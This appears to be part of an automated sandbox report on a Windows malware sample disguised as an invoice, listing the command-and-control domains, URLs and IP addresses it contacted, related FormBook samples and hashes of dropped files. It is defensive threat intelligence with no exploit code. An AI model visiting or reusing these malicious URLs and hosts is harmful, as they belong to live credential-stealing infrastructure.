            http://www.earbudsstore.shop/0gis/?h7i-=tZtx&IUY=aMrcg/vn2G/nVrncRMm9sg/9wEZLpPTCuDhUOTj2ocWrQXkoPHFbln5FmLoTaWY74KRoWkXSZUSbj2dC1qWbeU//egp4ZoVrxwEcZqidFa5edjFbZGfsKVU=0%Avira URL Cloudsafe
            http://www.beylikduzu616161.xyz/2nga/0%Avira URL Cloudsafe
            http://www.oztalkshw.store/20oo/0%Avira URL Cloudsafe
            http://www.orbitoasis.online/k6yn/?h7i-=tZtx&IUY=tNpa1p20+8HvGGTFO8FkkeyNbaBnDGg9aQgmgnvjgQBap2YCvQVXfu0lL5fLGicbWcSejDEnKeIqzsVAbPYV9SmH+8E676AUWIvi1rNZuDh4+Pmog8xR0m4=100%Avira URL Cloudmalware
            http://www.orbitoasis.online/k6yn/100%Avira URL Cloudmalware
            http://www.superiorfencing.net/bwyw/0%Avira URL Cloudsafe
            http://www70.earbudsstore.shop/0%Avira URL Cloudsafe
            http://www.mydreamdeal.click/1ag2/?IUY=4VB/N4F6tibqC9FQILl1J+73qE/jxtiF4YtEqiz3GsaSMOHPZtZI38VqeQNXmBxLoc2gIm7YkXHcJ/CISLsxf+n8D3thRkzZ5amN14yu7swz/i/g4nn3MSQ=&h7i-=tZtx0%Avira URL Cloudsafe
            http://www.thaor56.online/cboa/0%Avira URL Cloudsafe
            http://www.thaor56.online/cboa/?IUY=af1TSyH9ZKWDWOLhq+2G7N4mtZVzPtI6MbDiaGUzr5LnkxoPx276h73cE37euV2f02htPG9gF0GAKqxhPgTdcj/L3zWCPcCWIrrHTA4XRmlAzoY0158k8yU=&h7i-=tZtx0%Avira URL Cloudsafe
            http://www.superiorfencing.net/bwyw/?IUY=zeqgG3zf3rSD22A0zF5wS4zK0N2/jqmuTT/213oW5xKBpEmM0JRqJaWJcKUMxr+7Esc9obOTS2jlvNaYH8wfaL2cIGBALQwkeJY/zX4xE0yHRYNxEJGWTyE=&h7i-=tZtx0%Avira URL Cloudsafe
            http://www.dailyfuns.info/n9b0/0%Avira URL Cloudsafe
            http://www.beylikduzu616161.xyz/2nga/?h7i-=tZtx&IUY=Q2EbwnYhq4vEVEYxQpA6sukiKEquLN4lBliPtc8X0AIyDwowOCFGn/261E09vvaaF3LvgpjgW8Wvr6GWd63UOpRMNSn6wTuIcZ+YR2jjC7j32XIp3HKhGr0=0%Avira URL Cloudsafe
            http://www.mydreamdeal.click/1ag2/0%Avira URL Cloudsafe
            https://zkdamdjj.shop/vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/0%Avira URL Cloudsafe
            http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1733328730.9784753976&other_args=eyJ1cmkiOiAiLzBnaX0%Avira URL Cloudsafe
            http://www.zxyck.net/gxyh/0%Avira URL Cloudsafe
            http://www.zkdamdjj.shop/vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G7wrUY6Sf9n2bmecGwgkPVQzmhsXBPGmPUbE=0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.mydreamdeal.click
            		104.21.27.59
            		truetrue
              		unknown
              www.dating-apps-az-dn5.xyz
              		199.59.243.227
              		truetrue
                		unknown
                superiorfencing.net
                		103.230.159.86
                		truetrue
                  		unknown
                  thaor56.online
                  		202.92.5.23
                  		truetrue
                    		unknown
                    www.zkdamdjj.shop
                    		172.67.187.114
                    		truetrue
                      		unknown
                      www.earbudsstore.shop
                      		194.195.220.41
                      		truetrue
                        		unknown
                        www.dailyfuns.info
                        		209.74.77.109
                        		truetrue
                          		unknown
                          www.oztalkshw.store
                          		199.59.243.227
                          		truetrue
                            		unknown
                            wcq77.top
                            		154.23.184.194
                            		truetrue
                              		unknown
                              www.maitreyatoys.world
                              		194.245.148.189
                              		truetrue
                                		unknown
                                nieuws-july202541.sbs
                                		162.0.215.33
                                		truetrue
                                  		unknown
                                  www.zxyck.net
                                  		118.107.250.103
                                  		truetrue
                                    		unknown
                                    www.yc791022.asia
                                    		101.35.209.183
                                    		truetrue
                                      		unknown
                                      www.beylikduzu616161.xyz
                                      		172.67.180.246
                                      		truetrue
                                        		unknown
                                        gtml.huksa.huhusddfnsuegcdn.com
                                        		23.167.152.41
                                        		truefalse
                                          		high
                                          orbitoasis.online
                                          		66.29.132.194
                                          		truetrue
                                            		unknown
                                            www.wcq77.top
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.75178.club
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.nieuws-july202541.sbs
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.orbitoasis.online
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.superiorfencing.net
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.thaor56.online
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.zxyck.net/gxyh/?IUY=xivIugper8hSVuoO04jTuRZuLjO4xxMGnAUBMzrp/j5qvAoCvNj6F2x9r/oRQ/YEeKRSLhAnFUBxmqELIOT+5QAFQKguKJNKmb5QmpQkz0/MRH6o2CbFa8M=&h7i-=tZtxtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.beylikduzu616161.xyz/2nga/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.dailyfuns.info/n9b0/?IUY=A8VrqyfvUbO/Hw2LPQ4NsXlD/s5AVNHZj5dGp0FbdWJo87i+fAzGqYzWbkPjYDkNrmWhazG0hIjSjfnpkftd/stSTEWpskOuncpocPTypnt0UF6pA8n7oU4=&h7i-=tZtxtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.superiorfencing.net/bwyw/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.earbudsstore.shop/0gis/?h7i-=tZtx&IUY=aMrcg/vn2G/nVrncRMm9sg/9wEZLpPTCuDhUOTj2ocWrQXkoPHFbln5FmLoTaWY74KRoWkXSZUSbj2dC1qWbeU//egp4ZoVrxwEcZqidFa5edjFbZGfsKVU=true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.orbitoasis.online/k6yn/true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.earbudsstore.shop/0gis/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.orbitoasis.online/k6yn/?h7i-=tZtx&IUY=tNpa1p20+8HvGGTFO8FkkeyNbaBnDGg9aQgmgnvjgQBap2YCvQVXfu0lL5fLGicbWcSejDEnKeIqzsVAbPYV9SmH+8E676AUWIvi1rNZuDh4+Pmog8xR0m4=true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.dailyfuns.info/n9b0/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.mydreamdeal.click/1ag2/?IUY=4VB/N4F6tibqC9FQILl1J+73qE/jxtiF4YtEqiz3GsaSMOHPZtZI38VqeQNXmBxLoc2gIm7YkXHcJ/CISLsxf+n8D3thRkzZ5amN14yu7swz/i/g4nn3MSQ=&h7i-=tZtxtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.beylikduzu616161.xyz/2nga/?h7i-=tZtx&IUY=Q2EbwnYhq4vEVEYxQpA6sukiKEquLN4lBliPtc8X0AIyDwowOCFGn/261E09vvaaF3LvgpjgW8Wvr6GWd63UOpRMNSn6wTuIcZ+YR2jjC7j32XIp3HKhGr0=true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.mydreamdeal.click/1ag2/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.thaor56.online/cboa/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.thaor56.online/cboa/?IUY=af1TSyH9ZKWDWOLhq+2G7N4mtZVzPtI6MbDiaGUzr5LnkxoPx276h73cE37euV2f02htPG9gF0GAKqxhPgTdcj/L3zWCPcCWIrrHTA4XRmlAzoY0158k8yU=&h7i-=tZtxtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.superiorfencing.net/bwyw/?IUY=zeqgG3zf3rSD22A0zF5wS4zK0N2/jqmuTT/213oW5xKBpEmM0JRqJaWJcKUMxr+7Esc9obOTS2jlvNaYH8wfaL2cIGBALQwkeJY/zX4xE0yHRYNxEJGWTyE=&h7i-=tZtxtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.zxyck.net/gxyh/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.zkdamdjj.shop/vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G7wrUY6Sf9n2bmecGwgkPVQzmhsXBPGmPUbE=true
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://www.oztalkshw.storeRAVCpl64.exe, 00000003.00000002.3397437830.000000000072B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://duckduckgo.com/chrome_newtabwinrs.exe, 00000004.00000003.1239625858.000000000858D000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmp, -4EF4J77B.4.drfalse
                                                          		high
                                                          https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchwinrs.exe, 00000004.00000003.1239625858.000000000858D000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmp, -4EF4J77B.4.drfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=-4EF4J77B.4.drfalse
                                                              		high
                                                              http://www.oztalkshw.store/20oo/RAVCpl64.exe, 00000003.00000002.3397437830.000000000072B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icowinrs.exe, 00000004.00000003.1239625858.000000000858D000.00000004.00000020.00020000.00000000.sdmp, -4EF4J77B.4.drfalse
                                                                		high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-4EF4J77B.4.drfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://zkdamdjj.shop/vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/RAVCpl64.exe, 00000003.00000002.3402223545.0000000004B24000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.00000000043B4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1342780756.000000002ACB4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ac.ecosia.org/autocomplete?q=winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.google.comRAVCpl64.exe, 00000003.00000002.3402223545.00000000062B2000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.3402223545.0000000005C6A000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.00000000054FA000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.0000000005B42000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3400291491.0000000006A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://joker.com/?pk_campaign=Parking&pk_kwd=textRAVCpl64.exe, 00000003.00000002.3402223545.0000000005AD8000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.0000000005368000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www70.earbudsstore.shop/winrs.exe, 00000004.00000002.3399100655.00000000049FC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=winrs.exe, 00000004.00000003.1239625858.000000000858D000.00000004.00000020.00020000.00000000.sdmp, -4EF4J77B.4.drfalse
                                                                            		high
                                                                            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referRAVCpl64.exe, 00000003.00000002.3402223545.0000000004E48000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.3402223545.0000000005F8E000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.000000000581E000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.00000000046D8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1733328730.9784753976&other_args=eyJ1cmkiOiAiLzBnaXRAVCpl64.exe, 00000003.00000002.3402223545.000000000516C000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.00000000049FC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://gemini.google.com/app?q=winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  194.195.220.41
                                                                                  		www.earbudsstore.shopGermany
                                                                                  		6659NEXINTO-DEtrue
                                                                                  209.74.77.109
                                                                                  		www.dailyfuns.infoUnited States
                                                                                  		31744MULTIBAND-NEWHOPEUStrue
                                                                                  172.67.187.114
                                                                                  		www.zkdamdjj.shopUnited States
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  172.67.180.246
                                                                                  		www.beylikduzu616161.xyzUnited States
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  103.230.159.86
                                                                                  		superiorfencing.netAustralia
                                                                                  		133159MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAUtrue
                                                                                  66.29.132.194
                                                                                  		orbitoasis.onlineUnited States
                                                                                  		19538ADVANTAGECOMUStrue
                                                                                  118.107.250.103
                                                                                  		www.zxyck.netHong Kong
                                                                                  		24321OCENET-AS-APOCESdnBhdISPMYtrue
                                                                                  104.21.27.59
                                                                                  		www.mydreamdeal.clickUnited States
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  202.92.5.23
                                                                                  		thaor56.onlineViet Nam
                                                                                  		45899VNPT-AS-VNVNPTCorpVNtrue

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1568482
                                                                                  Start date and time:2024-12-04 17:08:38 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 9m 11s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                  Run name:Potential for more IOCs and behavior
                                                                                  Number of analysed new started processes analysed:13
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:1
                                                                                  Technologies:
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Sample name:Invoice 10493.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@18/9
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SgrmBroker.exe, svchost.exe
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                                                                  • VT rate limit hit for: Invoice 10493.exe

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  11:11:30API Interceptor11805081x Sleep call for process: winrs.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  194.195.220.41A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.earbudsstore.shop/0gis/
                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.earbudsstore.shop/0gis/
                                                                                  SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.gemtastic.shop/junu/
                                                                                  Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.techcables.shop/0hup/
                                                                                  TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.ytonetgearhub.shop/l8y2/
                                                                                  swift_payment_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.cheapdesklamp.shop/9nq7/
                                                                                  209.74.77.109Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • www.greenthub.life/r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc=
                                                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.greenthub.life/r3zg/
                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.dailyfuns.info/n9b0/
                                                                                  W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.gogawithme.live/6gtt/
                                                                                  DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.futuru.xyz/8uep/
                                                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.greenthub.life/r3zg/
                                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.moviebuff.info/4r26/
                                                                                  PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.gogawithme.live/6gtt/
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.gogawithme.live/6gtt/
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.gogawithme.live/6gtt/
                                                                                  172.67.187.114Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • www.zkdamdjj.shop/swhs/?2O=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&ChhG6=J-xs
                                                                                  YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.zkdamdjj.shop/kf1m/
                                                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.zkdamdjj.shop/swhs/
                                                                                  TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                                  • www.zkdamdjj.shop/z3j2/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.mydreamdeal.clickA2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.169.6
                                                                                  ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 104.21.27.59
                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 188.114.96.3
                                                                                  www.earbudsstore.shopA2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 194.195.220.41
                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 194.195.220.41
                                                                                  www.zkdamdjj.shopDocument_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 172.67.187.114
                                                                                  YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.187.114
                                                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.187.114
                                                                                  BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.40.167
                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.40.167
                                                                                  TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.187.114
                                                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.40.167
                                                                                  Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.40.167
                                                                                  NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.40.167
                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 188.114.97.3
                                                                                  www.dailyfuns.infoA2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.109
                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.109
                                                                                  www.dating-apps-az-dn5.xyzSW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                  • 199.59.243.227
                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 199.59.243.227

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSvenomderek.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                  • 104.26.13.205
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.3.89
                                                                                  nbjekadkthgawd.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.165.166
                                                                                  fukjsefsdfh.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.82.174
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.165.166
                                                                                  17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                  • 162.159.61.3
                                                                                  downloader2.htaGet hashmaliciousXWormBrowse
                                                                                  • 104.21.80.1
                                                                                  1733325245efb540ba670bc87cda05695e7839c909eeca3e1633b495d258461820ead14a47442.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.211.47
                                                                                  https://larester.es/rhude/Odrivex/Get hashmaliciousUnknownBrowse
                                                                                  • 104.16.124.96
                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                  • 188.114.97.6
                                                                                  NEXINTO-DEteste.m68k.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                  • 195.179.60.20
                                                                                  File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                                  • 212.229.88.28
                                                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 212.228.4.135
                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 194.163.209.67
                                                                                  W3UokmKK3o.msiGet hashmaliciousUnknownBrowse
                                                                                  • 195.179.237.110
                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 194.195.220.41
                                                                                  arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 212.229.165.81
                                                                                  ppc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 195.180.12.28
                                                                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 212.228.240.237
                                                                                  arm5.elfGet hashmaliciousMiraiBrowse
                                                                                  • 194.195.203.106
                                                                                  CLOUDFLARENETUSvenomderek.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                  • 104.26.13.205
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.3.89
                                                                                  nbjekadkthgawd.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.165.166
                                                                                  fukjsefsdfh.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.82.174
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.165.166
                                                                                  17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                  • 162.159.61.3
                                                                                  downloader2.htaGet hashmaliciousXWormBrowse
                                                                                  • 104.21.80.1
                                                                                  1733325245efb540ba670bc87cda05695e7839c909eeca3e1633b495d258461820ead14a47442.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.211.47
                                                                                  https://larester.es/rhude/Odrivex/Get hashmaliciousUnknownBrowse
                                                                                  • 104.16.124.96
                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                  • 188.114.97.6
                                                                                  MULTIBAND-NEWHOPEUSPO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.107
                                                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.107
                                                                                  Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 209.74.77.109
                                                                                  Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.79.42
                                                                                  SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.107
                                                                                  72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.79.42
                                                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.107
                                                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.109
                                                                                  Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 209.74.77.107
                                                                                  specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 209.74.64.187

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\-4EF4J77B

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\winrs.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):135168
                                                                                  Entropy (8bit):1.1142956103012707
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                  MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                  SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                  SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                  SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Countee

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\Invoice 10493.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):287744
                                                                                  Entropy (8bit):7.992853873619494
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:bmKu/0eU6rVi6PnZUS3pghjInSO4id/oakMqVVZJ:yRrlPuEahjIS1iOrrZJ
                                                                                  MD5:26AD12FC84F985D07D591CEA8FE255A9
                                                                                  SHA1:63FA7DB4CDC46FFFEC652C09C92D20604CAA471E
                                                                                  SHA-256:A29363B9594EFA63766D320C0763386902FA74E3D3AB0F9DABB69875AB70A25A
